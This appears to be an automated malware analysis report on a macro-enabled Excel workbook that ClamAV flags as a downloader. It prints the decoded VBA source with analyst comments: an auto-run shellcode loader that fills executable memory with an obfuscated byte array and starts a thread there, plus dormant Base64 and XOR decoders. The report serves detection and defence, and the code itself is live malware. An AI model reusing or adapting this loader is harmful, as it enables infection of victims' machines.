MALICIOUS
164
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is an Office document containing VBA macros, specifically triggering the Auto_Open, AutoOpen and Workbook_Open heuristics, indicating malicious intent. ClamAV detections confirm its malicious nature as a downloader. The VBA script allocates memory, copies an embedded byte array into it one byte at a time, and then creates a thread at that address — an in-memory loader pattern — which, together with the downloader classification, strongly suggests it downloads and executes a second-stage payload.
Heuristics 5
-
ClamAV: Doc.Downloader.Generic-6698421-0 — critical — CLAMAV_DETECTION — ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
-
VBA project inside OOXML — medium — 3 related findings — OOXML_VBA — Document contains a VBA project — VBA macros present
-
AutoOpen macro — low — OLE_VBA_AUTOOPEN — AutoOpen macro — Matched line in script:
End Sub Sub AutoOpen() Auto_Open -
Workbook_Open macro — low — OLE_VBA_WBOPEN — Workbook_Open macro — Matched line in script:
End Sub Sub Workbook_Open() Auto_Open -
Auto_Open macro — low — OLE_VBA_AUTO — Auto_Open macro — Matched line in script:
#End If Sub Auto_Open() Dim raObRmpRuGl As Long, EqkClDZDVjYzBN As Variant, ArDJBQlSlg As Long
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12840 bytes |
| SHA-256: be29fa810f2906631fc07e8c7507360c37a7b96469f96d4e0fc5a4bdb38ad5fe | | | |
|||
Preview script — First 1,000 lines of the extracted script
' Analyst notes: this preview concatenates three module streams decoded from the
' workbook's vbaProject.bin. Only Module1 carries procedures in this extract.
' --- stream: ThisWorkbook (stream attributes only in this extract) ---
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' --- stream: Sheet1 (stream attributes only in this extract) ---
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' --- stream: Module1 (every procedure below lives here) ---
Attribute VB_Name = "Module1"
' The next two lines sit outside any procedure, so they would not compile as
' written and look like leftover template text. ActiveDocument belongs to the
' Word object model, while this project was carved from an Excel workbook
' (xl/vbaProject.bin), so the "HDRUpJOeFvEArori" document variable is unlikely
' to exist at run time — TODO confirm against the original container.
"Use this line to add the document variable to you file and then remove these comments."
ActiveDocument.Variables.Add Name:="HDRUpJOeFvEArori", Value:=""
' Win32 imports used by the loader in Auto_Open. The VBA7 branch (64-bit-aware
' hosts) uses LongPtr for pointer-sized arguments and return values; the #Else
' branch is the legacy 32-bit form. Note the arithmetic-obfuscated constants
' ((0 Xor 0) = 0, (14 + 49) = 63) that recur throughout this module — the code
' is clearly constant-folded, presumably to evade simple signature matching.
#If VBA7 Then
' Module state for the Base64 decoder further down: an "initialised" flag,
' the 64-byte alphabet (indices 0..63) and a 128-entry reverse lookup (0..127).
Private DQcefcxPbaD As Boolean
Private KihzhPuASVYDi((0 Xor 0) To (14 + 49)) As Byte
Private FlaFCYAGRxWn(((0 Xor 0) + (0 Xor 0)) To 127) As Byte
' VirtualAlloc + RtlMoveMemory + CreateThread declared side by side inside an
' Office macro is a high-signal indicator of in-process shellcode execution.
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Ddjnhd As Long, ByVal Nvrgsxxnd As Long, ByVal Lvoyer As LongPtr, Tsa As Long, ByVal Xicali As Long, Yeooh As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Wmovb As Long, ByVal Ptk As Long, ByVal Xdcn As Long, ByVal Gbzr As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Qrlft As LongPtr, ByRef Axnli As Any, ByVal Gnppt As Long) As LongPtr
#Else
' Same three imports for pre-VBA7 (32-bit only) hosts; no module-state
' declarations are repeated here, so the decoder arrays only exist under VBA7.
Private Declare Function CreateThread Lib "kernel32" (ByVal Ddjnhd As Long, ByVal Nvrgsxxnd As Long, ByVal Lvoyer As Long, Tsa As Long, ByVal Xicali As Long, Yeooh As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Wmovb As Long, ByVal Ptk As Long, ByVal Xdcn As Long, ByVal Gbzr As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Qrlft As Long, ByRef Axnli As Any, ByVal Gnppt As Long) As Long
#End If
' Live entry point (also reached through the AutoOpen and Workbook_Open stubs
' below). Classic in-process loader: the byte array built here is copied one
' byte at a time into a freshly committed executable region and a thread is
' started at its base address. Every array element is an integer expression
' that folds to a single byte value at run time; the Xor/+ forms are
' obfuscation only. The payload bytes are not decoded in this preview.
Sub Auto_Open()
' raObRmpRuGl: current byte value; EqkClDZDVjYzBN: payload array; ArDJBQlSlg: loop index
Dim raObRmpRuGl As Long, EqkClDZDVjYzBN As Variant, ArDJBQlSlg As Long
' Kfz: base address returned by VirtualAlloc; Zfwefa: scratch for API return values
#If VBA7 Then
Dim Kfz As LongPtr, Zfwefa As LongPtr
#Else
Dim Kfz As Long, Zfwefa As Long
#End If
' Payload array: several hundred obfuscated byte constants, split with line
' continuations (do not insert anything between the continued lines).
EqkClDZDVjYzBN = Array(((8 Xor 166) + 44), (133 + (9 Xor 68)), (88 + 99), (57 Xor 217), ((56 Xor 125) + (37 Xor 13)), 101, (57 Xor 120), (201 + 16), (12 + 104), 36, (75 Xor 191), (36 Xor 122), (6 Xor 53), ((58 Xor 170) + 57), 177, (51 + (1 Xor 39)), (11 + 38), 94, (5 Xor 28), (2 Xor 1), ((25 Xor 56) + 61), (19 + (0 Xor 6)), (102 + (12 Xor 17)), (174 Xor 104), ((1 Xor 3) + 2), ((1 Xor 3) + (0 Xor 0)), (3 Xor 155), (11 Xor 146), 169, (25 + 52), 99, 98, ((4 Xor 13) + 33), 49, 237, ((15 Xor 24) + 112), (23 + 4), ((46 Xor 97) + (20 Xor 0)), (60 Xor 181), ((55 Xor 10) + 143), _
14, ((36 Xor 162) + 45), ((67 Xor 137) + 15), (76 Xor 205), (88 Xor 250), (34 Xor 26), (76 Xor 195), (15 Xor 62), 48, 76, ((11 Xor 7) + 12), ((3 Xor 7) + 7), (113 + 72), (29 Xor 162), ((7 Xor 159) + 87), (15 + 18), (19 + (1 Xor 81)), 142, (186 Xor 117), (2 + (6 Xor 30)), (31 Xor 72), (77 + (61 Xor 121)), (61 + (26 Xor 108)), ((41 Xor 30) + 41), (4 Xor 128), (70 Xor 55), ((0 Xor 0) + 141), ((2 Xor 122) + (12 Xor 62)), (190 Xor 103), (109 Xor 29), (164 + 38), (29 + (68 Xor 27)), 151, ((23 Xor 88) + 78), 134, ((125 Xor 232) + (70 Xor 38)), ((5 Xor 0) + (0 Xor 0)), _
((6 Xor 24) + 83), (88 + (7 Xor 31)), ((49 Xor 127) + (40 Xor 27)), 232, _
(42 Xor 103), ((77 Xor 26) + 40), (9 Xor 76), 103, 237, ((6 Xor 1) + (0 Xor 0)), (27 Xor 251), 184, 153, ((5 Xor 31) + (98 Xor 195)), (42 Xor 193), ((3 Xor 9) + 222), (33 + 16), (105 Xor 166), (23 Xor 179), 16, 58, 151, 20, 32, (147 + (76 Xor 16)), (79 Xor 226), (134 Xor 26), (60 Xor 106), (47 + 4), 231, ((25 Xor 61) + (9 Xor 2)), ((28 Xor 59) + 65), ((17 Xor 85) + 124), (74 + (117 Xor 12)), ((22 Xor 44) + 138), ((32 Xor 26) + (52 Xor 105)), (0 Xor 0), ((6 Xor 23) + (8 Xor 1)), ((8 Xor 28) + 7), ((2 Xor 15) + (49 Xor 120)), (8 Xor 107), (30 Xor 78), _
((17 Xor 14) + 24), ((14 Xor 44) + 54), (8 + (142 Xor 58)), (72 + (10 Xor 1)), 167, 46, (21 Xor 163), 167, (6 Xor 92), (40 Xor 1), 13, (76 Xor 153), (116 + (3 Xor 15)), (105 + (8 Xor 91)), (81 + 64), (108 Xor 17), (26 Xor 88), ((14 Xor 41) + 63), (107 + (10 Xor 0)), (55 + 72), ((116 Xor 0) + 19), (206 Xor 63), (14 + (100 Xor 148)), 115, (50 + 58), 117, (61 + 27), (144 Xor 0), (106 + 9), (81 Xor 11), (154 + (26 Xor 35)), (106 + (15 Xor 77)), (110 Xor 150), (90 + (3 Xor 0)), (46 Xor 29), ((2 Xor 0) + 35), (115 + 71), (7 Xor 126), 151, (14 + 95), (9 + 15), (2 + (204 Xor 45)), _
(21 + (53 Xor 76)), 203, (120 + (58 Xor 109)), 28, 208, (126 + 54), ((34 Xor 8) + 134), 184, (38 + (70 Xor 51)), 87, ((85 Xor 197) + (11 Xor 29)), 189, ((15 Xor 92) + 17), ((49 Xor 68) + (22 Xor 37)), 199, (114 + 113), 242, ((6 Xor 71) + 35), 10, 28, (2 Xor 0), (226 Xor 1), (19 + 10), ((62 Xor 82) + (1 Xor 2)), 48, 172, 181, (155 + (14 Xor 66)), (80 + (5 Xor 45)), (4 + (7 Xor 38)), ((4 Xor 8) + 4), ((189 Xor 106) + (6 Xor 46)), 9, (22 Xor 55), (101 Xor 198), (8 + 39), (65 Xor 240), (24 + 10), (38 + (42 Xor 29)), 208, ((42 Xor 105) + 126), ((0 Xor 1) + (54 Xor 92)), _
(134 + (2 Xor 22)), 132, 145, 3, ((2 Xor 4) + 5), (88 + 77), 122, 212, 180, (36 + 76), ((8 Xor 5) + 9), ((4 Xor 3) + 215), ((6 Xor 29) + (3 Xor 4)), ((29 Xor 92) + (96 Xor 26)), ((2 Xor 58) + 22), (118 + (9 Xor 16)), (20 + 30), (45 + 38), (53 + (12 Xor 91)), ((31 Xor 47) + (0 Xor 0)), (7 + (2 Xor 25)), 248, (21 Xor 12), (77 + 137), (5 + (9 Xor 6)), (29 + 51), (47 Xor 102), 71, 213, (0 + 0), (31 + (9 Xor 3)), ((20 Xor 15) + (11 Xor 23)), (158 Xor 35), (37 + 37), (6 + (31 Xor 191)), ((51 Xor 103) + 20), (175 Xor 114), 116, _
109, 1, (108 Xor 24), (40 + 115), ((90 Xor 249) + (23 Xor 47)), (67 + 54), ((21 Xor 35) + (83 Xor 248)), ((1 Xor 3) + (0 Xor 0)), 70, (215 Xor 38), (49 + 95), ((3 Xor 10) + (111 Xor 173)), ((44 Xor 98) + 15), ((37 Xor 29) + (38 Xor 97)), (8 Xor 154), 64, ((21 Xor 70) + 4), (122 Xor 5), ((7 Xor 58) + 32), ((41 Xor 105) + (35 Xor 66)), (16 + 2), (130 Xor 17), ((39 Xor 161) + 4), (180 + 34), (144 + (46 Xor 98)), 107, (37 + 38), ((3 Xor 67) + 51), 220, (0 Xor 1), (35 Xor 108), (151 + 62), ((6 Xor 56) + (42 Xor 103)), (188 Xor 1), (14 Xor 67), (0 + 0), _
((143 Xor 34) + (55 Xor 121)), (37 + (39 Xor 27)), ((9 Xor 0) + (160 Xor 4)), 103, 120, (7 Xor 98), (28 Xor 77), (223 Xor 41), ((14 Xor 26) + (15 Xor 59)), ((0 Xor 0) + (17 Xor 12)), (37 Xor 65), ((4 Xor 12) + (29 Xor 121)), 244, ((37 Xor 14) + (17 Xor 15)), 137, (80 + (0 Xor 16)), (24 Xor 236), (91 Xor 210), 223, 234, 244, ((13 Xor 166) + (26 Xor 44)), 135, ((2 Xor 4) + 72), (101 + (51 Xor 113)), (20 + 0), ((15 Xor 56) + 145), 90, (212 Xor 0), 132, (74 + 19), (62 Xor 91), ((10 Xor 59) + 91), (37 Xor 92), (206 Xor 59), 13, (45 Xor 31), (146 Xor 53), (33 + 16), _
146, (13 Xor 192), 130, 65, (138 Xor 95), _
((5 Xor 14) + 38), ((68 Xor 3) + (0 Xor 9)), (34 Xor 76), 126, ((30 Xor 47) + (5 Xor 45)), ((57 Xor 80) + 65), ((3 Xor 15) + (15 Xor 45)), (19 Xor 109), (34 Xor 187), 192, ((55 Xor 191) + 38), 46, 241, (29 Xor 2), ((2 Xor 20) + (10 Xor 96)), ((8 Xor 49) + 136), (33 + 16), (149 + (53 Xor 127)), ((3 Xor 10) + 2), 138, 89, 106, ((73 Xor 218) + 71), ((15 Xor 41) + (77 Xor 31)), (243 + 5), 107, (153 Xor 110), (130 Xor 95), (117 Xor 209), 108, (2 Xor 246), 197, 87, ((14 Xor 27) + (1 Xor 0)), (26 + (39 Xor 124)), (39 + (1 Xor 211)), (116 + (6 Xor 34)), 231, _
((89 Xor 45) + 43), 158, (76 + 77), 231, ((63 Xor 104) + (64 Xor 8)), 160, 166, (10 + (38 Xor 1)), 166, (29 + 185), 233, ((18 Xor 88) + (25 Xor 46)), ((90 Xor 44) + (21 Xor 50)), (87 + 146), (27 Xor 71), (78 + (19 Xor 74)), (4 + 176), ((33 Xor 2) + 64), (152 + (0 Xor 6)), 251, (67 Xor 132), 161)
' &H1000 = MEM_COMMIT, &H40 = PAGE_EXECUTE_READWRITE: a private, writable AND
' executable region. The requested size is UBound(), one less than the element
' count; VirtualAlloc rounds up to a page so the loader still works, but it is
' a sloppy edge worth noting when fingerprinting this builder.
Kfz = VirtualAlloc((0 + 0), UBound(EqkClDZDVjYzBN), &H1000, &H40)
' Copy one byte per iteration: raObRmpRuGl is a Long, and only its low byte is
' moved (length argument folds to 1), so each element must already fit in 0..255.
For ArDJBQlSlg = LBound(EqkClDZDVjYzBN) To UBound(EqkClDZDVjYzBN)
raObRmpRuGl = EqkClDZDVjYzBN(ArDJBQlSlg)
Zfwefa = RtlMoveMemory(Kfz + ArDJBQlSlg, raObRmpRuGl, ((0 Xor 0) + 1))
Next ArDJBQlSlg
' Thread start address = the RWX buffer; all other arguments fold to 0.
' Detection opportunity: an Office host calling CreateThread on a non-image,
' executable private allocation right after a VirtualAlloc(..., &H40).
Zfwefa = CreateThread(0, ((0 Xor 0) + 0), Kfz, 0, ((0 Xor 0) + (0 Xor 0)), ((0 Xor 0) + (0 Xor 0)))
End Sub
' Word-style auto-macro name; forwards straight to Auto_Open so the loader
' fires under either naming convention (presumably to cover both Word and Excel hosts).
Sub AutoOpen()
Auto_Open
End Sub
' Excel workbook-open event handler; forwards straight to Auto_Open. Note it is
' defined in Module1 rather than the ThisWorkbook stream, so whether Excel
' actually raises it from here is worth confirming in a sandbox run.
Sub Workbook_Open()
Auto_Open
End Sub
' Standard Base64 decoder (A-Z a-z 0-9 + / alphabet, "=" padding) built on the
' module's lazily initialised lookup tables. Nothing in Auto_Open reaches this
' function in the extract — only xtAWpYUZEa calls it — so it appears to be
' unused builder/template residue rather than part of the live infection chain.
' dKfCJalAik: Base64 text. Returns: the decoded bytes as a 0-based Byte().
' Raises vbObjectError (empty description) when the input length is not a
' multiple of 4, when any character is >= 128, or when a character is not in
' the alphabet (reverse-table value > 63). All constants below are obfuscated:
' the four "> ..." limits fold to 127 and the next four fold to 63.
Public Function MdRKHJSpYcfey(ByVal dKfCJalAik As String) As Byte()
' Build the alphabet / reverse lookup on first use.
If Not DQcefcxPbaD Then ycNRyZstPVXIx
' Narrow the UTF-16 String to one byte per character.
Dim UzpIMmEQMxuC() As Byte: UzpIMmEQMxuC = ONyEusdaMk(dKfCJalAik)
Dim XZZTxZcocoviy As Long: XZZTxZcocoviy = UBound(UzpIMmEQMxuC) + 1
If XZZTxZcocoviy Mod 4 <> (0 Xor 0) Then Err.Raise vbObjectError, , ""
' Drop trailing "=" padding from the effective length.
Do While XZZTxZcocoviy > (0 + (0 Xor 0))
If UzpIMmEQMxuC(XZZTxZcocoviy - ((0 Xor 1) + (0 Xor 0))) <> Asc("=") Then Exit Do
XZZTxZcocoviy = XZZTxZcocoviy - (1 Xor 0)
Loop
' Output length = unpadded length * 3 \ 4.
Dim cmjhdGdylJxZ As Long: cmjhdGdylJxZ = (XZZTxZcocoviy * ((1 Xor 3) + 1)) \ 4
Dim fsKGtGgiVerQf() As Byte
ReDim fsKGtGgiVerQf(0 To cmjhdGdylJxZ - (0 Xor 1)) As Byte
Dim UxMnhneejjlv As Long
Dim ifVrXqiKLmbJqT As Long
' Consume four characters per iteration; missing 3rd/4th characters (already
' stripped padding) are treated as "A" (sextet 0).
Do While UxMnhneejjlv < XZZTxZcocoviy
Dim QZwImjRdFya As Byte: QZwImjRdFya = UzpIMmEQMxuC(UxMnhneejjlv): UxMnhneejjlv = UxMnhneejjlv + ((0 Xor 0) + 1)
Dim eRvEOxuniVCT As Byte: eRvEOxuniVCT = UzpIMmEQMxuC(UxMnhneejjlv): UxMnhneejjlv = UxMnhneejjlv + (1 + 0)
Dim GmKjwkFPsGIrnG As Byte: If UxMnhneejjlv < XZZTxZcocoviy Then GmKjwkFPsGIrnG = UzpIMmEQMxuC(UxMnhneejjlv): UxMnhneejjlv = UxMnhneejjlv + (1 + 0) Else GmKjwkFPsGIrnG = Asc("A")
Dim BDUYNMHbxEEoR As Byte: If UxMnhneejjlv < XZZTxZcocoviy Then BDUYNMHbxEEoR = UzpIMmEQMxuC(UxMnhneejjlv): UxMnhneejjlv = UxMnhneejjlv + (1 Xor 0) Else BDUYNMHbxEEoR = Asc("A")
' Reject anything outside the 128-entry reverse table.
If QZwImjRdFya > (11 + (103 Xor 19)) Or eRvEOxuniVCT > 127 Or GmKjwkFPsGIrnG > (26 Xor 101) Or BDUYNMHbxEEoR > ((16 Xor 81) + (28 Xor 34)) Then _
Err.Raise vbObjectError, , ""
Dim XxeUCetKef As Byte: XxeUCetKef = FlaFCYAGRxWn(QZwImjRdFya)
Dim wmJvoLAqqeW As Byte: wmJvoLAqqeW = FlaFCYAGRxWn(eRvEOxuniVCT)
Dim fUeWjEpVKwn As Byte: fUeWjEpVKwn = FlaFCYAGRxWn(GmKjwkFPsGIrnG)
Dim RGzzrOZYQmcfQI As Byte: RGzzrOZYQmcfQI = FlaFCYAGRxWn(BDUYNMHbxEEoR)
' Reverse table holds 255 for non-alphabet characters, so > 63 means invalid.
If XxeUCetKef > (9 + 54) Or wmJvoLAqqeW > 63 Or fUeWjEpVKwn > ((18 Xor 7) + (25 Xor 51)) Or RGzzrOZYQmcfQI > (42 + (15 Xor 26)) Then _
Err.Raise vbObjectError, , ""
' Repack four 6-bit sextets into three bytes.
Dim fIDzqXkbtYtLx As Byte: fIDzqXkbtYtLx = (XxeUCetKef * (4 + 0)) Or (wmJvoLAqqeW \ &H10)
Dim eNFXIduFQmNKyD As Byte: eNFXIduFQmNKyD = ((wmJvoLAqqeW And &HF) * &H10) Or (fUeWjEpVKwn \ ((2 Xor 6) + 0))
Dim ohlFSpkxuu As Byte: ohlFSpkxuu = ((fUeWjEpVKwn And 3) * &H40) Or RGzzrOZYQmcfQI
fsKGtGgiVerQf(ifVrXqiKLmbJqT) = fIDzqXkbtYtLx: ifVrXqiKLmbJqT = ifVrXqiKLmbJqT + 1
If ifVrXqiKLmbJqT < cmjhdGdylJxZ Then fsKGtGgiVerQf(ifVrXqiKLmbJqT) = eNFXIduFQmNKyD: ifVrXqiKLmbJqT = ifVrXqiKLmbJqT + (1 Xor 0)
If ifVrXqiKLmbJqT < cmjhdGdylJxZ Then fsKGtGgiVerQf(ifVrXqiKLmbJqT) = ohlFSpkxuu: ifVrXqiKLmbJqT = ifVrXqiKLmbJqT + ((0 Xor 1) + 0)
Loop
MdRKHJSpYcfey = fsKGtGgiVerQf
End Function
' One-time initialisation for the Base64 decoder: fills the 64-entry alphabet
' (A-Z, a-z, 0-9, "+", "/") and a 128-entry reverse lookup in which every
' non-alphabet position holds 255 ((224 Xor 31) folds to 255), then sets the
' module flag so MdRKHJSpYcfey does not rebuild the tables.
Private Sub ycNRyZstPVXIx()
' rJLqInozYBrFK: character code being inserted; TwbaJbBpihMA: write index
Dim rJLqInozYBrFK As Integer, TwbaJbBpihMA As Integer
TwbaJbBpihMA = (0 Xor 0)
For rJLqInozYBrFK = Asc("A") To Asc("Z"): KihzhPuASVYDi(TwbaJbBpihMA) = rJLqInozYBrFK: TwbaJbBpihMA = TwbaJbBpihMA + (0 + (1 Xor 0)): Next
For rJLqInozYBrFK = Asc("a") To Asc("z"): KihzhPuASVYDi(TwbaJbBpihMA) = rJLqInozYBrFK: TwbaJbBpihMA = TwbaJbBpihMA + 1: Next
For rJLqInozYBrFK = Asc("0") To Asc("9"): KihzhPuASVYDi(TwbaJbBpihMA) = rJLqInozYBrFK: TwbaJbBpihMA = TwbaJbBpihMA + (0 Xor 1): Next
KihzhPuASVYDi(TwbaJbBpihMA) = Asc("+"): TwbaJbBpihMA = TwbaJbBpihMA + (0 + (1 Xor 0))
KihzhPuASVYDi(TwbaJbBpihMA) = Asc("/"): TwbaJbBpihMA = TwbaJbBpihMA + 1
' Upper bound folds to 127: mark all 128 reverse entries as invalid first.
For TwbaJbBpihMA = (0 Xor 0) To ((4 Xor 0) + (119 Xor 12)): FlaFCYAGRxWn(TwbaJbBpihMA) = (224 Xor 31): Next
' Then map each alphabet character back to its 0..63 sextet value.
For TwbaJbBpihMA = 0 To 63: FlaFCYAGRxWn(KihzhPuASVYDi(TwbaJbBpihMA)) = TwbaJbBpihMA: Next
DQcefcxPbaD = True
End Sub
' Narrows a VBA String to one byte per character. Assigning a String to a
' Byte() yields its UTF-16LE bytes, so each character is rebuilt as
' low + 256 * high (the multiplier folds to 256) and any code point >= 256
' (limit folds to 256) is replaced by "?". An empty string is returned as-is.
' dKfCJalAik: input text. Returns: 0-based Byte(), one entry per character.
Private Function ONyEusdaMk(ByVal dKfCJalAik As String) As Byte()
Dim wmJvoLAqqeW() As Byte: wmJvoLAqqeW = dKfCJalAik
' Character count = raw byte count \ 2.
Dim BFOibYMfXEx As Long: BFOibYMfXEx = (UBound(wmJvoLAqqeW) + 1) \ ((0 Xor 0) + 2)
If BFOibYMfXEx = 0 Then ONyEusdaMk = wmJvoLAqqeW: Exit Function
Dim fUeWjEpVKwn() As Byte
ReDim fUeWjEpVKwn((0 Xor 0) To BFOibYMfXEx - ((1 Xor 0) + (0 Xor 0))) As Byte
Dim jBsXhDUPnc As Long
For jBsXhDUPnc = (0 Xor 0) To BFOibYMfXEx - (1 + 0)
Dim rJLqInozYBrFK As Long: rJLqInozYBrFK = wmJvoLAqqeW(2 * jBsXhDUPnc) + ((49 Xor 114) + (122 Xor 199)) * CLng(wmJvoLAqqeW((0 Xor 2) * jBsXhDUPnc + ((1 Xor 0) + 0)))
If rJLqInozYBrFK >= ((35 Xor 21) + 202) Then rJLqInozYBrFK = Asc("?")
fUeWjEpVKwn(jBsXhDUPnc) = rJLqInozYBrFK
Next
ONyEusdaMk = fUeWjEpVKwn
End Function
' XOR string decoder: each element of DTTRNIujYuLvn is XOR-ed with the key byte
' at index (element index + inWQmntGydvZT), where the key is the Base64-decoded
' value of the "HDRUpJOeFvEArori" document variable, and the result is returned
' as a String via Chr. Nothing in this extract calls it, so it reads as dormant
' builder/template code — the live loader in Auto_Open carries its bytes inline.
' DTTRNIujYuLvn: array of byte-sized values. inWQmntGydvZT: key offset.
' Caveats: the loop variable TwbaJbBpihMA is not declared here (no Option
' Explicit is visible), so it is an implicit Variant; and ActiveDocument is the
' Word object model, so in this Excel-hosted project the call below would most
' likely fail with an object error if it were ever reached — TODO confirm.
Private Function xtAWpYUZEa(DTTRNIujYuLvn As Variant, inWQmntGydvZT As Integer)
Dim FWxNHfTXHUv As String
Dim trCCJLLerjvhv() As Byte
trCCJLLerjvhv = MdRKHJSpYcfey(ActiveDocument.Variables("HDRUpJOeFvEArori"))
FWxNHfTXHUv = ""
For TwbaJbBpihMA = LBound(DTTRNIujYuLvn) To UBound(DTTRNIujYuLvn)
FWxNHfTXHUv = FWxNHfTXHUv & Chr(trCCJLLerjvhv(TwbaJbBpihMA + inWQmntGydvZT) Xor DTTRNIujYuLvn(TwbaJbBpihMA))
Next
xtAWpYUZEa = FWxNHfTXHUv
End Function
|
|||
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 33280 bytes |
| SHA-256: 171962e904a8d9aa1d5fc3331e944e982e663a5e37fb7d82c27bd73b584a3c1a | | | |
|||
|
Detection
ClamAV:
Doc.Downloader.Generic-6698421-0
Obfuscation or payload:
unlikely
|
|||